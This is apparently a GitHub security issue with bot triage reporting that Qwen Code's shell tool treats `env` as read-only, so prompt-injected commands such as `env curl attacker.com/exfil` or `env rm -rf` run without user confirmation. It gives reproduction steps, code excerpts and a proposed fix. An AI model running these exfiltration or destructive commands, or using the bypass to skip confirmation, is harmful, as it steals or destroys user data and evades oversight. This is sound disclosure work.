security: `env` in read-only command allowlist enables arbitrary command execution

[pomelo-nwu]

Summary

The env command is included in READ_ONLY_ROOT_COMMANDS in both shellReadOnlyChecker.ts and shellAstParser.ts. This causes the shell tool to treat env as a read-only command that bypasses the user confirmation prompt.

However, env is not just a "print environment variables" utility — it is a command proxy that can execute arbitrary commands with side effects:

env open -a Calculator          # opens an app
env rm -rf /tmp/important       # deletes files
env curl attacker.com/exfil     # exfiltrates data

Impact

Any user running Qwen Code in the default (non-sandbox) configuration could be affected. If an attacker injects a malicious prompt (via code, web pages, documents, etc.) that tricks the LLM into executing env <arbitrary_command>, the command runs without user confirmation.

Attack path

Prompt injection → LLM generates `env <malicious_cmd>` → shellTool classifies as read-only → executes without confirmation → arbitrary code execution

Affected code

• packages/core/src/utils/shellReadOnlyChecker.ts — READ_ONLY_ROOT_COMMANDS set (line 31)
• packages/core/src/utils/shellAstParser.ts — READ_ONLY_ROOT_COMMANDS set (line 86)

Suggested fix

Remove 'env' from both READ_ONLY_ROOT_COMMANDS sets. After this change, all env invocations will go through the normal user-confirmation flow, closing the bypass path.

Reproduction

1. Start qwen in default mode (non-sandbox)
2. Send a prompt like: Please help me run this command: env open -a Calculator
3. Observe that env open -a Calculator executes without user confirmation (calculator opens)

Note: LLM output is non-deterministic — it may take a few attempts for the model to actually emit the env command.

[qwen-code-ci-bot]

Triage

• Type: bug (security — prompt-injection → arbitrary command execution)
• Labels: type/bug, category/security, scope/shell, priority/P1, status/needs-triage
• Reproduced: yes — code-level verification confirms the bypass in both the regex checker (shellReadOnlyChecker.ts:31) and the AST checker (shellAstParser.ts:86). Both treat env as the root command and return true without analyzing what follows.
• Scope of impact: every non-sandbox qwen session. env <arbitrary_cmd> is classified read-only and skips the confirmation prompt.
• Fix direction: remove 'env' from both READ_ONLY_ROOT_COMMANDS sets, exactly as the reporter suggests. Note: packages/core/src/tools/shell.ts:269-315 and permissions/shell-semantics.ts:1875 also reference env — these are wrapper-stripping layers (for git-commit trailer attribution and virtual-op extraction), not read-only allowlists; they don't block the fix but should be audited in the same PR to make sure no implicit "safe" assumption leaks through.
• Caveat: printenv (also in the allowlist) is genuinely harmless — it can't execute anything. Don't conflate the two in the fix.
• Next: this is a small, well-scoped fix — good candidate for a community PR. Add a regression test that asserts isShellCommandReadOnlyAST('env touch /tmp/x') and isShellCommandReadOnly('env curl evil.com') both return false.

中文说明

• 类型: bug（安全类——提示注入 → 任意命令执行）
• 标签: type/bug, category/security, scope/shell, priority/P1, status/needs-triage
• 复现: 是。代码层确认绕过路径同时存在于正则判定器（shellReadOnlyChecker.ts:31）和 AST 判定器（shellAstParser.ts:86）——两者都把 env 当作根命令直接判 true，不分析后面的内容。
• 影响范围: 所有非沙箱模式的 qwen 会话。env <任意命令> 会被归为只读，跳过确认提示。
• 修复方向: 按报告人建议，从两个 READ_ONLY_ROOT_COMMANDS 集合中移除 'env'。注意 packages/core/src/tools/shell.ts:269-315 与 permissions/shell-semantics.ts:1875 也引用了 env，但属于包装器剥离层（用于 git commit 归属和虚拟操作提取），不是只读白名单；它们不妨碍修复，但同一 PR 里应一并审计，避免"安全"假设侧漏。
• 提示: printenv（同样在白名单中）本身无害——它无法执行其他命令。修复时不要与 env 一并处理。
• 下一步: 改动小而聚焦，适合作为社区 PR。补回归测试：断言 isShellCommandReadOnlyAST('env touch /tmp/x') 与 isShellCommandReadOnly('env curl evil.com') 均返回 false。

— Qwen Code · qwen3.7-max

Stage 2 — Verification

Reproduction (code-level)

Tried two live tmux runs against the installed qwen (v0.17.1). Non-interactive -p mode refuses to execute any shell tool without -y, and with -y the model's own safety judgment declined to run the literal env touch /tmp/marker prompt, so the live path was inconclusive. Switched to code-level verification, which is definitive:

packages/core/src/utils/shellReadOnlyChecker.ts:20-54
  const READ_ONLY_ROOT_COMMANDS = new Set([ ..., 'env', ..., 'printenv', ... ]);

packages/core/src/utils/shellReadOnlyChecker.ts:328-334
  const { root, args } = skipEnvironmentAssignments(tokens);
  const normalizedRoot = root.toLowerCase();
  if (!READ_ONLY_ROOT_COMMANDS.has(normalizedRoot)) return false;
  // falls through to return true — args are never inspected

packages/core/src/utils/shellAstParser.ts:75-106
  const READ_ONLY_ROOT_COMMANDS = new Set([ ..., 'env', ..., 'printenv', ... ]);

packages/core/src/utils/shellAstParser.ts:758-773  (evaluateCommandReadOnly)
  const root = getCommandName(commandNode);
  if (!READ_ONLY_ROOT_COMMANDS.has(root)) return false;
  if (root === 'git') return evaluateGitReadOnly(argTexts);
  if (root === 'find') return evaluateFindReadOnly(argTexts);
  if (root === 'sed') return evaluateSedReadOnly(argTexts);
  if (root === 'awk') return evaluateAwkReadOnly(argTexts);
  return true;  // ← 'env' lands here, args unexamined

For env touch /tmp/x, both paths resolve root=env ∈ allowlist → return true. The confirmation prompt is skipped and the arbitrary subcommand runs. Same for env rm -rf /, env open -a Calculator, env curl evil.com/exfil, env -i touch file, env -u FOO curl ..., etc.

Affected surface

• Default (non-sandbox) sessions: arbitrary command execution without user confirmation when the LLM emits env <cmd>.
• Sandbox mode: unaffected for the filesystem-execution path, but the classifier is also used for cost-free tool execution decisions, so the misclassification still leaks into other flows.

Recommended fix

1. Remove 'env' from READ_ONLY_ROOT_COMMANDS in both shellReadOnlyChecker.ts and shellAstParser.ts.
2. Add regression tests in shellAstParser.test.ts and shellReadOnlyChecker.test.ts covering env <write-cmd>, env -i <write-cmd>, env -u FOO <write-cmd>, and env <read-cmd> (the last should now return false as well — acceptable, since env ls is uncommon and the conservative default is correct).
3. Keep printenv — it is genuinely read-only.
4. Audit the env references in tools/shell.ts and permissions/shell-semantics.ts for implicit "safe" assumptions; these are wrapper-stripping layers and don't block the fix, but should be checked in the same PR.

— Qwen Code · qwen3.7-max